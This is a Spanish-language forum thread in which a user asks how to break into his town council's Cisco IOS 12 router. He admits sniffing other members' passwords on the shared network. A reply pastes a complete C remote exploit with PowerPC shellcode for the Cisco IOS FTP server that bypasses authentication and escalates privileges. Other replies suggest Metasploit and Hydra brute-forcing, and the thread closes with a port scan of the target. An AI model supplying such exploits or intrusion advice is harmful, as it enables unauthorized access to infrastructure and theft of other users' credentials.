Hackear un router Cisco IOS 12 X ...Porfavor ayuda...

[|Fenix|]

Hola a todos.
Es mi primer post a ver como sale.
Yo vivo en una población en la que el ayuntamiento tiene Internet
para todos los que quieran abonarse, me gustaría acceder a su router
que es un Cisco IOS 12 x e leído en varios foros que tiene bugs pero
todos para acceder vía Web, mi problema este router tiene el puerto Web
cerrado, solo es accesible vía TELNET.
Soy miembro de la red y coloque un sniffer, saco montones de contraseñas
de toda la red pero nunca acceden al router, que puedo hacer? Como saco la contraseña TELNET?
No tiene puesta las claves por defecto y llevo mas de dos meses con el sniffer sin resultado, el user no me lo pide tan solo el pass
Gracias de antemano por vuestra ayuda.

[Jarmen Kell]

prueba con algún exploit de metasploit, en backtrack hay mogollon de programas para cisco

[|Fenix|]

Podrias decirme alguno en especial? Esque no me entiendo demasiado bien con el tema hack.
Porfavor dime alguno en particular que sirviera para el Cisco IOS 12 X.
Gracias por anticipado

[Jarmen Kell]

Código [Seleccionar] Expandir

/*

Cisco IOS FTP server remote exploit by Andy Davis 2008               
                                                                     
Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007               
                                                                     
Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router   
                                                                     
Removes the requirement to authenticate and escalates to level 15   
                                                                     
*********************************************************************
To protect the innocent a critical step has been omitted, which means
the shellcode will only execute when the router is attached to gdb. 
I'm sure the PowerPC shellcoders out there will work it out...       
*********************************************************************
                                                                     
Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
on the original IOS security research                               
                                                                     
iosftpexploit <at> googlemail 'dot' com                             

*/

#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>

#define PORT 21

int main(int argc, char **argv)
{
unsigned char sendbuf[] =

"MKD "

/* .equ vty_info, 0x8182da60    # pointer to VTY info */
/* .equ terminate, 0x80e4086c   # kill a process */

"\x3c\x80\x81\x83"      /* lis     4,vty_info@ha */
"\x38\x84\xda\x60"      /* la      4,vty_info@l(4) */
"\x7d\x08\x42\x78"      /* xor     8,8,8 */
"\x7c\xe4\x40\x2e"      /* lwzx    7,4,8 */
"\x91\x07\x01\x74"      /* stw     8,372(7) */
"\x39\x08\xff\xff"      /* subi    8,8,1 */
"\x38\xe7\x09\x1a"      /* addi    7,7,233 */
"\x91\x07\x04\xca"      /* stw     8,1226(7) */
"\x7d\x03\x43\x78"      /* mr      3,8 */
"\x3c\x80\x80\xe4"      /* lis     4,terminate@ha */
"\x38\x84\x08\x6c"      /* la      4,terminate@l(4) */
"\x7c\x89\x03\xa6"      /* mtctr   4 */
"\x4e\x80\x04\x20"      /* bctr    */

/* exists cleanly without adversely affecting the FTP server */

"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */

"\x80\x06\x23\xB8"      /* return address */
"\x0d\x0a";

/* trampoline code */
/* when the overflow occurs r26+0x14 points to the shellcode */
/*
0x800623B8      lwz     26, 20(26)
0x800623BC      mtctr   26
0x800623C0      mr      3, 27
0x800623C4      bctrl
*/

unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s;

if (argc != 2)
        {
        printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");

        printf ("\nUsage: %s <target IP address>\n",argv[0]);
        exit(-1);
        }

servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);

s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
printf ("Sending exploit...\n\n");

if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
        {
        printf("Error sending packet...quitting\n\n");
        exit (1);
        }
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...\n\n");
}

// milw0rm.com [2008-07-29]

[|Fenix|]

Muchas gracias, pero podrias indicarme como se usa ese codigo??que tengo que hacer exactamente con el??
Ademas el codigo parece que es para FTP y lo necesito para TELNET.
Espero que perdones lo inesperto que soy en este tema, pero te agradezco muchisimo tu esfuerzo.
Responde cuanto antes porfavor, gracias por anticipado

[Jarmen Kell]

me extraña que no esté abierto el puerto 21...

[|Fenix|]

No, no lo tiene abierto estoy totalmente seguro.
Saves la manera de colarme o el codigo para telnet???
Gracias por anticipado amigo.

[Jarmen Kell]

no se me ocurre nada, lo mismo puedes sacar la pass de telnet con hydra.... no lo he probado

[|Fenix|]

Ok de todas formas gracias por tu ayuda.
Y no hay nadie masss por aqui??? que pueda echarme una mano??????
Porfavor contesten es importanteeeee graciassss!!!!!

[|Fenix|]

Despues de un escaneo con Zenmap a la ip tiene abierto los siguientes puertos:
7/tcp    open     echo
9/tcp    open     discard?
13/tcp   open     daytime      Cisco router daytime
19/tcp   open     chargen
23/tcp   open     telnet       Cisco router
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
2001/tcp open     telnet       Cisco router
6001/tcp open     tcpwrapped
hay alguna otra manera de acceder al router???? gracias amigos por anticipado